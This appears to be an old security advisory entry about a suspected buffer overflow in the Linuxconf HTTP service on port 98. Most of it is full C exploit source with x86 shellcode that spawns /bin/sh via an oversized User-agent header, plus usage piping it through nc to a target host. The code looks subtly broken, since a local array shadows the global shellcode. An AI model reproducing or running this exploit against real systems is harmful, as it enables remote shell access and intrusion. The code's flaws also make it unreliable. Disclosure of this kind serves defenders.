COMMAND

    linuxconf

SYSTEMS AFFECTED

    Linux

PROBLEM

    Elias Levy posted following.   There may exists a buffer  overflow
    vulnerability in the Linuxconf  package shipped with some  version
    of  Linux  systems.   The  vulnerability  may  be in the program's
    handling of HTTP headers.  Initial testing with Linuxconf  1.16r10
    under RedHat 6.0 was inconclusive.  If other can test the  exploit
    and report their results it would be appreciated.

    This is an example of  what good can happen from  sharing security
    incident information.   There have been  reports in the  INCIDENTS
    mailing list for several months now  of scans for port 98.   Since
    no publicly  known major  vulnerabilities existed  in this service
    the traffic was somewhat strange.   After some digging around  Jon
    Starnaud was able to find this exploit.

    /*
    
      linuxconf exploit by R00T-X (c) 1999
    
      USER_AGENT overflow x86
      should work on all linux's but you need to have
      network access to linuxconf
    
      greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P
    
      have fun with this but for EDUCATIONAL PURPOSES :)
    
      Usage:   (./linexp <offset>;cat)| nc targethost 98
    
     */
    
    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh\x00";
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <limits.h>
    #include <string.h>
    
    #define BUFLEN 1025
    #define NOP 0x90
    
    void
    main (int argc, char *argv[])
    {
      char buf[BUFLEN];
      int offset,nop,i;
      unsigned long esp;
      char shell[1024+300];
    
      if(argc < 2)
      {
      fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
      exit(0);
      }
    
      nop = 511;
      esp = 0xefbfd5e8;
      offset = atoi(argv[1]);
    
      memset(buf, NOP, BUFLEN);
      memcpy(buf+(long)nop, shell, strlen(shell));
    
      for (i = 256; i < BUFLEN - 3; i += 2)
    {    *((int *) &buf[i]) = esp + (long) offset;
         shell[ sizeof(shell)-1 ] = 0;
    }
    
     printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
      for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    
      printf("\r\n");
    
      return;
    }

SOLUTION

    Nothing yet.